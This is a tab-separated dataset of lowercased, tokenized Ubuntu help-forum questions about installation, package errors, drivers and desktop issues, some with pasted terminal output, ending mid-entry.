515327	how to install ubuntu on mac mini ?	my mac mini crashed . i have iso file of ubuntu 14.04 on my windows machine . can i create a bootable usb disc of ubuntu using my windows machine and install ubuntu in my mac mini ? your help will be appreciated .
515328	pyvenv still broken on 14.04.1 ?	meow @ te : ~ # pyvenv-3.4 v error : command ' [ '/meow/v/bin/python3.4 ' , '-im ' , 'ensurepip ' , ' -- upgrade ' , ' -- default-pip ' ] ' returned non-zero exit status 1 i thought it was fixed . i 've done update and upgrade , did reboot after updating all the latest fixes since release . i still hit this problem . thoughts ? pyvenv-3.4 error : returned non-zero exit status 1
515330	how do i go about removing all the language packs i do n't need	i just noticed that in /usr/share/help i have the ubuntu help files in 70 different languages . i only speak 2 , and i only really compute in one . i also noticed that it is full of broken symbolic links to /usr/share/help-langpack . i want just want to get rid of all the languages i do n't need . how can i do this without getting all rm -r happy ? i 'm preferably looking for a way to do this without installing any new packages , as my main goal is to get rid of excess stuff on my machine . i 'd like to find a way to do this preferably with dpkg , or apt .
515332	can i delete libc-bin ?	question is simple , i need to know because i cant upgrade/install anything , because it always says i have to uninstall/delete it to continue . it also says dont do it , if i dont know what i am doing . edit : sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run ‘apt-get -f install’ to correct these . the following packages have unmet dependencies . ia32-libs-multiarch : i386 : depends : libqtcore4 : i386 but it is not installed depends : libqtgui4 : i386 but it is not installed depends : libqt4-dbus : i386 but it is not installed depends : libqt4-network : i386 but it is not installed depends : libqt4-opengl : i386 but it is not installed depends : libqt4-qt3support : i386 but it is not installed depends : libqt4-script : i386 but it is not installed depends : libqt4-scripttools : i386 but it is not installed depends : libqt4-sql : i386 but it is not installed depends : libqt4-svg : i386 but it is not installed depends : libqt4-test : i386 but it is not installed depends : libqt4-xml : i386 but it is not installed depends : libqt4-xmlpatterns : i386 but it is not installed depends : libcups2 : i386 but it is not installed depends : libcupsimage2 : i386 but it is not installed depends : libcurl3 : i386 but it is not installed depends : libnss3 : i386 but it is not installed depends : libnspr4 : i386 but it is not installed depends : libssl1.0.0 : i386 but it is not installed recommends : libgl1-mesa-glx : i386 but it is not installed recommends : libgl1-mesa-dri : i386 but it is not installed lib32ffi6 : depends : libc6-i386 ( > = 2.4 ) but it is not installed lib32gcc1 : depends : libc6-i386 ( > = 2.5 ) but it is not installed lib32nss-mdns : depends : libc6-i386 ( > = 2.4 ) but it is not installed lib32stdc++6 : depends : libc6-i386 ( > = 2.4 ) but it is not installed lib32z1 : depends : libc6-i386 ( > = 2.4 ) but it is not installed libacl1 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed libattr1 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed libaudio2 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed libavahi-client3 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed depends : libdbus-1-3 : i386 ( > = 1.1.1 ) but it is not installed libavahi-common3 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed libcomerr2 : i386 : depends : libc6 : i386 ( > = 2.12 ) but it is not installed libdb5.1 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed libdrm-intel1 : i386 : depends : libc6 : i386 ( > = 2.3.4 ) but it is not installed libdrm-nouveau1a : i386 : depends : libc6 : i386 ( > = 2.1.3 ) but it is not installed libdrm-radeon1 : i386 : depends : libc6 : i386 ( > = 2.3.4 ) but it is not installed libdrm2 : i386 : depends : libc6 : i386 ( > = 2.7 ) but it is not installed libffi6 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed libfontconfig1 : i386 : depends : libc6 : i386 ( > = 2.7 ) but it is not installed depends : libexpat1 : i386 ( > = 1.95.8 ) but it is not installed depends : libfreetype6 : i386 ( > = 2.2.1 ) but it is not installed libgcc1 : i386 : depends : libc6 : i386 ( > = 2.2.4 ) but it is not installed libgcrypt11 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed libgdbm3 : i386 : depends : libc6 : i386 ( > = 2.1.3 ) but it is not installed libglib2.0-0 : i386 : depends : libc6 : i386 ( > = 2.9 ) but it is not installed libgpg-error0 : i386 : depends : libc6 : i386 ( > = 2.1.3 ) but it is not installed libice6 : i386 : depends : libc6 : i386 ( > = 2.11 ) but it is not installed libidn11 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed libjpeg62 : i386 : depends : libc6 : i386 ( > = 2.7 ) but it is not installed libkeyutils1 : i386 : depends : libc6 : i386 ( > = 2.1.3 ) but it is not installed liblcms1 : i386 : depends : libc6 : i386 ( > = 2.7 ) but it is not installed libllvm2.9 : i386 : depends : libc6 : i386 ( > = 2.11 ) but it is not installed libmng1 : i386 : depends : libc6 : i386 ( > = 2.11 ) but it is not installed libpciaccess0 : i386 : depends : libc6 : i386 ( > = 2.7 ) but it is not installed libpcre3 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed librtmp0 : i386 : depends : libc6 : i386 ( > = 2.7 ) but it is not installed depends : libgnutls26 : i386 ( > = 2.9.11-0 ) but it is not installed libsasl2-2 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed libsasl2-modules : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed depends : libssl1.0.0 : i386 ( > = 1.0.0 ) but it is not installed libselinux1 : i386 : depends : libc6 : i386 ( > = 2.8 ) but it is not installed libsm6 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed libsqlite3-0 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed libstdc++6 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed libuuid1 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed libx11-6 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed libxau6 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed libxcb1 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed libxdamage1 : i386 : depends : libc6 : i386 ( > = 2.1.3 ) but it is not installed libxdmcp6 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed libxext6 : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed libxfixes3 : i386 : depends : libc6 : i386 ( > = 2.1.3 ) but it is not installed libxrender1 : i386 : depends : libc6 : i386 ( > = 2.1.3 ) but it is not installed libxss1 : i386 : depends : libc6 : i386 ( > = 2.1.3 ) but it is not installed libxt6 : i386 : depends : libc6 : i386 ( > = 2.7 ) but it is not installed libxxf86vm1 : i386 : depends : libc6 : i386 ( > = 2.1.3 ) but it is not installed zlib1g : i386 : depends : libc6 : i386 ( > = 2.4 ) but it is not installed e : unmet dependencies . try using -f. szikszay @ szikszay-latitude-e5530-non-vpro : ~ $ sudo apt-get upgrade -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages will be removed libc-bin the following new packages will be installed libc-bin : i386 libc6 : i386 libc6-i386 libcups2 : i386 libcupsimage2 : i386 libcurl3 : i386 libdbus-1-3 : i386 libexpat1 : i386 libfreetype6 : i386 libgl1-mesa-dri : i386 libgl1-mesa-glx : i386 libglapi-mesa : i386 libgnutls26 : i386 libgssapi-krb5-2 : i386 libk5crypto3 : i386 libkrb5-3 : i386 libkrb5support0 : i386 libldap-2.4-2 : i386 libnspr4 : i386 libnss3 : i386 libpng12-0 : i386 libqt4-dbus : i386 libqt4-declarative : i386 libqt4-designer : i386 libqt4-network : i386 libqt4-opengl : i386 libqt4-qt3support : i386 libqt4-script : i386 libqt4-scripttools : i386 libqt4-sql : i386 libqt4-svg : i386 libqt4-test : i386 libqt4-xml : i386 libqt4-xmlpatterns : i386 libqtcore4 : i386 libqtgui4 : i386 libssl1.0.0 : i386 libtasn1-3 : i386 libtiff4 : i386 libxi6 : i386 the following packages have been kept back : ginn libgrip0 linux-headers-generic linux-image-generic unity unity-common xserver-xorg-input-evdev xserver-xorg-input-synaptics the following packages will be upgraded : accountsservice acpi-support acpid aisleriot alsa-utils app-install-data-partner apparmor appmenu-qt apport apport-gtk apt apt-transport-https apt-utils aptdaemon aptdaemon-data apturl apturl-common at-spi2-core bamfdaemon banshee banshee-extension-soundmenu banshee-extension-ubuntuonemusicstore baobab bind9-host binutils bluez bluez-alsa bluez-cups bluez-gstreamer brasero brasero-cdrkit brasero-common brltty bzip2 ca-certificates-java checkbox checkbox-gtk colord command-not-found command-not-found-data compiz compiz-core compiz-gnome compiz-plugins-default compiz-plugins-main-default cups cups-bsd cups-client cups-common cups-ppdc dbus dbus-x11 deja-dup desktop-file-utils dnsutils dpkg ecryptfs-utils empathy empathy-common eog evince evince-common evolution-data-server evolution-data-server-common file-roller firefox firefox-globalmenu firefox-gnome-support firefox-locale-en firefox-locale-hu gbrainy gcalctool gconf2 gconf2-common gedit gedit-common ghostscript ghostscript-cups ghostscript-x gir1.2-atspi-2.0 gir1.2-gconf-2.0 gir1.2-gnomebluetooth-1.0 gir1.2-gtk-3.0 gir1.2-gtksource-3.0 gir1.2-totem-1.0 gir1.2-unity-4.0 gir1.2-webkit-3.0 gnome-accessibility-themes gnome-bluetooth gnome-control-center gnome-control-center-data gnome-desktop3-data gnome-font-viewer gnome-games-common gnome-icon-theme gnome-keyring gnome-mahjongg gnome-online-accounts gnome-orca gnome-power-manager gnome-screenshot gnome-search-tool gnome-session gnome-session-bin gnome-session-canberra gnome-session-common gnome-settings-daemon gnome-sudoku gnome-system-log gnome-system-monitor gnome-utils-common gnomine gnupg gpgv grub-common grub-pc grub-pc-bin grub2-common gstreamer0.10-gconf gstreamer0.10-plugins-good gstreamer0.10-pulseaudio gvfs gvfs-backends gvfs-bin gvfs-fuse gwibber gwibber-service gwibber-service-facebook gwibber-service-identica gwibber-service-twitter gzip hpijs hplip hplip-cups hplip-data icedtea-6-jre-cacao icedtea-6-jre-jamvm icedtea-netx ifupdown im-switch indicator-datetime indicator-session indicator-sound initramfs-tools initramfs-tools-bin initscripts insserv isc-dhcp-client isc-dhcp-common iso-codes jockey-common jockey-gtk language-pack-en language-pack-en-base language-pack-gnome-en language-pack-gnome-en-base language-pack-gnome-hu language-pack-gnome-hu-base language-pack-hu language-pack-hu-base language-selector-common language-selector-gnome libaccountsservice0 libapt-inst1.3 libapt-pkg4.11 libarchive1 libasound2-plugins libatk-adaptor libatspi2.0-0 libbamf0 libbamf3-0 libbind9-60 libbluetooth3 libbrasero-media3-1 libbrlapi0.5 libbz2-1.0 libc-dev-bin libc6 libc6-dev libcamel-1.2-29 libcanberra-gtk-module libcanberra-gtk0 libcanberra-gtk3-0 libcanberra-gtk3-module libcanberra-pulse libcanberra0 libcolord1 libcups2 libcupscgi1 libcupsdriver1 libcupsimage2 libcupsmime1 libcupsppdc1 libcurl3-gnutls libdbus-1-3 libdbus-glib-1-2 libdecoration0 libdns69 libebackend-1.2-1 libebook1.2-12 libecal1.2-10 libecryptfs0 libedata-book-1.2-11 libedata-cal-1.2-13 libedataserver1.2-15 libedataserverui-3.0-1 libevince3-3 libexif12 libexpat1 libfreetype6 libgail-3-0 libgail-3-common libgck-1-0 libgconf2-4 libgcr-3-1 libgdata-common libgdata13 libgl1-mesa-dri libgl1-mesa-glx libglapi-mesa libglu1-mesa libgnome-bluetooth8 libgnome-control-center1 libgnome-desktop-3-2 libgnutls26 libgoa-1.0-0 libgs9 libgs9-common libgssapi-krb5-2 libgtk-3-0 libgtk-3-bin libgtk-3-common libgtksourceview-3.0-0 libgtksourceview-3.0-common libgudev-1.0-0 libgweather-3-0 libgweather-common libgwibber-gtk2 libgwibber2 libhpmud0 libicu44 libimobiledevice2 libisc62 libisccc60 libisccfg62 libjasper1 libjs-jquery libk5crypto3 libkrb5-3 libkrb5support0 libldap-2.4-2 liblightdm-gobject-1-0 liblwres60 libmetacity-private0 libmission-control-plugins0 libmono-cairo4.0-cil libmono-corlib4.0-cil libmono-csharp4.0-cil libmono-i18n-west4.0-cil libmono-i18n4.0-cil libmono-posix4.0-cil libmono-security4.0-cil libmono-sharpzip4.84-cil libmono-system-configuration4.0-cil libmono-system-core4.0-cil libmono-system-drawing4.0-cil libmono-system-security4.0-cil libmono-system-xml4.0-cil libmono-system4.0-cil libmono-zeroconf1.0-cil libmysqlclient16 libnautilus-extension1 libncurses5 libncursesw5 libnm-glib-vpn1 libnm-glib4 libnm-gtk-common libnm-gtk0 libnm-util2 libnotify0.4-cil libnspr4 libnss3 libnss3-1d libnux-1.0-0 libnux-1.0-common libpam-gnome-keyring libpam-modules libpam-modules-bin libpam-runtime libpam0g libperl5.12 libpng12-0 libpoppler-glib6 libpoppler13 libproxy0 libpulse-mainloop-glib0 libpulse0 libpurple-bin libpurple0 libpython2.7 libqt4-dbus libqt4-declarative libqt4-network libqt4-opengl libqt4-script libqt4-sql libqt4-sql-mysql libqt4-svg libqt4-xml libqt4-xmlpatterns libqtcore4 libqtgui4 libreoffice-base-core libreoffice-calc libreoffice-common libreoffice-core libreoffice-draw libreoffice-emailmerge libreoffice-gnome libreoffice-gtk libreoffice-help-en-gb libreoffice-help-en-us libreoffice-help-hu libreoffice-impress libreoffice-l10n-common libreoffice-l10n-en-gb libreoffice-l10n-en-za libreoffice-l10n-hu libreoffice-math libreoffice-style-human libreoffice-writer libsane-hpaio libsmbclient libsnmp-base libsnmp15 libssl1.0.0 libsyncdaemon-1.0-1 libt1-5 libtasn1-3 libtiff4 libtinfo5 libtotem0 libubuntuone-1.0-1 libubuntuone1.0-cil libudev0 libunity-core-4.0-4 libunity6 libusbmuxd1 libv4l-0 libvorbis0a libvorbisenc2 libvorbisfile3 libwbclient0 libwebkitgtk-1.0-0 libwebkitgtk-1.0-common libwebkitgtk-3.0-0 libwebkitgtk-3.0-common libxi6 libxml2 libxslt1.1 lightdm linux-firmware linux-libc-dev mawk metacity metacity-common mobile-broadband-provider-info modemmanager mono-4.0-gac mono-gac mono-runtime mousetweaks multiarch-support mysql-common nautilus nautilus-data nautilus-sendto-empathy ncurses-base ncurses-bin network-manager network-manager-gnome nux-tools onboard openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib openssl perl perl-base perl-modules poppler-utils pulseaudio pulseaudio-esound-compat pulseaudio-module-bluetooth pulseaudio-module-gconf pulseaudio-module-x11 pulseaudio-utils python-apport python-aptdaemon python-aptdaemon-gtk python-aptdaemon.gtk3widgets python-aptdaemon.gtkwidgets python-brlapi python-crypto python-cups python-cupshelpers python-egenix-mxdatetime python-egenix-mxtools python-gobject python-gobject-cairo python-httplib2 python-keyring python-launchpadlib python-libproxy python-libxml2 python-pam python-papyon python-pkg-resources python-problem-report python-pyatspi2 python-software-properties python-ubuntuone-client python-ubuntuone-storageprotocol python-uno python2.7 python2.7-minimal qdbus samba-common samba-common-bin seahorse shotwell simple-scan smbclient sni-qt software-center software-properties-common software-properties-gtk sudo system-config-printer-common system-config-printer-gnome system-config-printer-udev sysv-rc sysvinit-utils telepathy-indicator telepathy-mission-control-5 thunderbird thunderbird-globalmenu thunderbird-gnome-support thunderbird-locale-en thunderbird-locale-en-gb thunderbird-locale-en-us thunderbird-locale-hu tomboy totem totem-common totem-mozilla totem-plugins transmission-common transmission-gtk ttf-opensymbol tzdata tzdata-java ubuntu-desktop ubuntu-docs ubuntu-minimal ubuntu-sso-client ubuntu-standard ubuntuone-client ubuntuone-client-gnome ubuntuone-couch udev unity-lens-applications unity-services uno-libs3 update-manager update-manager-core update-notifier update-notifier-common upstart ure usbmuxd vim-common vim-tiny vinagre vino whois x11-common xdiagnose xorg xserver-common xserver-xorg xserver-xorg-core xserver-xorg-input-all xserver-xorg-video-all xserver-xorg-video-intel xserver-xorg-video-openchrome xserver-xorg-video-qxl xul-ext-ubufox warning : the following essential packages will be removed . this should not be done unless you know exactly what you are doing ! libc-bin 498 upgraded , 40 newly installed , 1 to remove and 8 not upgraded . 69 not fully installed or removed . need to get 439 mb of archives . after this operation , 135 mb of additional disk space will be used . you are about to do something potentially harmful to continue type in the phrase ‘yes , do as i say ! ’ ? ] i tried to upgrade but it gives me an error , when i try to upgrade-f it says i should delete libc-bin . thanks for the answers btw . edit2 : it also says this : the package system is broken if you are using third party repositories then disable them , since they are a common source of problems . now run the following command in a terminal : apt-get install -f
515334	how do i fix unity crashing after using unity tweak tool to set window spreading/scaling ?	the problem : after setting window spreading to on in unity tweak tool , unity will crash on trying to initiate the window spread/scale compiz effect . this results in the unity panel and launcher , as well as window decorations disappearing . how does one fix this issue and stop it from happening ?
515335	disable bluetooth in kubuntu 14.04	does anyone know how to permanently disable bluetooth in kubuntu 14.04 ?
515336	i 'm unable to install windows7 after installing ubuntu 14.04	i 've installed ubuntu 14.04.1lts on 14/8/2014 . now i am trying to install windows7 but i am getting an error . please help me , any one . . . please .
515341	how to install ubuntu-12.10-desktop along with windows 8 64bit	i have hp pavilion 15 n204tx , which came with pre-installed ubuntu os . i formatted it and installed win 8 64bit . and created 3 + 1 ( system reserve ) partition . 50gb for win8 50gb for ubuntu remaining for my files and other is system reserve . but now i need ubuntu-12.10-desktop also , along with win8 . is there is a way to install ubuntu-12.10-desktop , without affecting my files and win8 on second 50gb partition . is the installation method is same as of other similar questions here . please answer and i do n't know anything about commands posted on other answers here , i just started to learn unix . so kindly tell where and how to use commands , if any thank you
515342	ca n't i open an app without a keyboard ?	any application which is not locked in the launcher can be opened via searching for it . but how do i open an application without the help of the keyboard ? that is , without typing in the search field . is there no way whatsoever in the entire of ubuntu operating system to open an app with only the mouse ( or any other non-keyboard device for that matter ) ? there has to be something like a response-accessibly central menu or something .
515343	how to remove encrypted ubuntu 14.04 os from ssd	i installed ubuntu 14.04 lts but i 've decided its not for me . during the install i was prompted to use disk encryption and i chose to do so and i had to use a passpharse to unlock the ssd prior to login . i couldnt find a way to remove this before so i re-installed ubuntu without incryption and it prompted me that it would format the ssd and i would lose everything that was on it ( which is what i wanted anyways ) but , it seems after the re-install was done . there was a protion of the ssd that was not deleted . ubuntu os was supposed to only take up 6.5gb and i have 256gb ssd . but after the re-install i only had 233gb , im guessing the encrypted part of the previous ubuntu install couldnt be deleted and now i 'm stuck with less memory . can anyone help with this i want to remove ubuntu completly off my ssd leaving it back to factory settings . how do i do this ?
515348	disadvantages installing gnome on ubuntu unity	i want to install gnome on ubuntu unity i want to know is there a risk of getting my ubuntu not work after boot are there other disadvantages of installing gnome on ubuntu unity .
515350	script shortcut to open two files in gedit as sudo	i want to double click a file on my desktop , and have two files be opened in gedit as sudo . whenever i 'm making a new website , i need to open /etc/hosts /etc/apache2/sites-enabled/000-default.conf as sudo . at the moment this means opening the terminal , runing sudo gedit then opening each file manually . i want to streamline this part of my workflow . on windows i had wrote a little bash script which worked nicely . how can i do the same in ubuntu ? so far in my searches i 've come across ways of adding a shortcut to the file browser , and similar things , but not exactly what i want . i have tried creating a desktop launcher , but ca n't see how to make it run as sudo .
515352	ubuntu 12.04 wireless ( wifi ) not working , can not upgrade to 12.10 , touchpad gestures not working . what to do ?	i installed ubuntu 12.04 lts 3 days ago and since then wireless feature and touchpad gestures are not working . tried everything on internet but still unsuccessful . i cant upgrade to ubuntu 12.10 . these are the following comments i tried . please help me . edit : just realized usb 3.0 is also not working . command lsb_release -r output -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - release : 12.04 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - command lspci output -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 00:00.0 host bridge : intel corporation xeon e3-1200 v3/4th gen core processor dram controller ( rev 06 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v3/4th gen core processor pci express x16 controller ( rev 06 ) 00:01.1 pci bridge : intel corporation xeon e3-1200 v3/4th gen core processor pci express x8 controller ( rev 06 ) 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) 00:14.0 usb controller : intel corporation 8 series/c220 series chipset family usb xhci ( rev 05 ) 00:16.0 communication controller : intel corporation 8 series/c220 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 1 ( rev d5 ) 00:1c.1 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 2 ( rev d5 ) 00:1c.2 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 3 ( rev d5 ) 00:1d.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm86 express lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 8 series/c220 series chipset family 6-port sata controller 1 [ ahci mode ] ( rev 05 ) 00:1f.3 smbus : intel corporation 8 series/c220 series chipset family smbus controller ( rev 05 ) 07:00.0 3d controller : nvidia corporation gf117m [ geforce 610m/710m / gt 620m/625m/630m/720m ] ( rev a1 ) 08:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 07 ) 09:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) 0f:00.0 network controller : qualcomm atheros qca9565 / ar9565 wireless network adapter ( rev 01 ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- command sudo apt-get install linux-backports-modules-wireless-lucid-generic output -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux-backports-modules-wireless-lucid-generic -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - command cat /etc/lsb-release ; uname -a output -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.5 lts '' linux ritwik-pc 3.2.0-67-generic # 101-ubuntu smp tue jul 15 17:46:11 utc 2014 x86_64 x86_64 x86_64 gnu/linux -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - command lspci -nnk | grep -ia2 net output -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 08:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 07 ) subsystem : hewlett-packard company device [ 103c:225d ] kernel driver in use : r8169 -- 0f:00.0 network controller [ 0280 ] : qualcomm atheros qca9565 / ar9565 wireless network adapter [ 168c:0036 ] ( rev 01 ) subsystem : hewlett-packard company device [ 103c:217f ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - command lsusb output -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:8008 intel corp . bus 002 device 002 : id 8087:8000 intel corp. -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - command iwconfig output -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - lo no wireless extensions . eth0 no wireless extensions . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - command rfkill list all output -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 0 : hp-wifi : wireless lan soft blocked : no hard blocked : no 1 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - command lsmod output -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - module size used by snd_hda_codec_realtek 224215 1 bnep 18281 2 rfcomm 47604 0 bluetooth 180113 10 bnep , rfcomm parport_pc 32866 0 ppdev 17113 0 nls_iso8859_1 12713 1 nls_cp437 16991 1 vfat 17585 1 fat 61512 1 vfat snd_hda_intel 33719 3 snd_hda_codec 127706 2 snd_hda_codec_realtek , snd_hda_intel snd_hwdep 17764 1 snd_hda_codec snd_pcm 97275 2 snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61929 2 snd_seq_midi , snd_seq_midi_event nouveau 775039 0 joydev 17693 0 snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq ttm 76949 1 nouveau uvcvideo 72627 0 snd 79041 15 snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device videodev 98259 1 uvcvideo drm_kms_helper 46978 1 nouveau psmouse 98051 0 drm 241971 3 nouveau , ttm , drm_kms_helper i2c_algo_bit 13423 1 nouveau soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm v4l2_compat_ioctl32 17128 1 videodev hp_wmi 18092 0 serio_raw 13211 0 sparse_keymap 13890 1 hp_wmi mxm_wmi 13021 1 nouveau video 19651 1 nouveau wmi 19256 2 hp_wmi , mxm_wmi mac_hid 13253 0 lp 17799 0 parport 46562 3 parport_pc , ppdev , lp r8169 62190 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - command sudo su modprobe -v ath9k output -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - insmod /lib/modules/3.2.0-67-generic/kernel/net/wireless/cfg80211.ko insmod /lib/modules/3.2.0-67-generic/kernel/drivers/net/wireless/ath/ath.ko insmod /lib/modules/3.2.0-67-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_hw.ko insmod /lib/modules/3.2.0-67-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_common.ko insmod /lib/modules/3.2.0-67-generic/kernel/net/mac80211/mac80211.ko insmod /lib/modules/3.2.0-67-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k.ko -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - command do-release-upgrade output -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - err upgrade tool signature 404 not found [ ip : 91.189.88.149 80 ] err upgrade tool 404 not found [ ip : 91.189.88.149 80 ] fetched 0 b in 0s ( 0 b/s ) warning : root : file 'quantal.tar.gz.gpg ' missing failed to fetch fetching the upgrade failed . there may be a network problem . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - command sudo modprobe ath9k dmesg | grep ath9k no output for them command dmesg | grep -e ath -e 80211 output -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - [ 13.232372 ] type=1400 audit ( 1408867538.399:9 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/mission-control-5 '' pid=975 comm= '' apparmor_parser '' [ 13.232615 ] type=1400 audit ( 1408867538.399:10 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/telepathy-* '' pid=975 comm= '' apparmor_parser '' [ 15.186599 ] ath3k : probe of 3-4:1.0 failed with error -110 [ 15.186635 ] usbcore : registered new interface driver ath3k [ 88.219329 ] cfg80211 : calling crda to update world regulatory domain [ 88.351665 ] cfg80211 : world regulatory domain updated : [ 88.351667 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 88.351670 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 88.351671 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 88.351673 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 88.351674 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 88.351675 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - command sudo apt-get install touchpad-indicator output -- -- -- -- -- -- -- -- -- -- -- -- -- -- 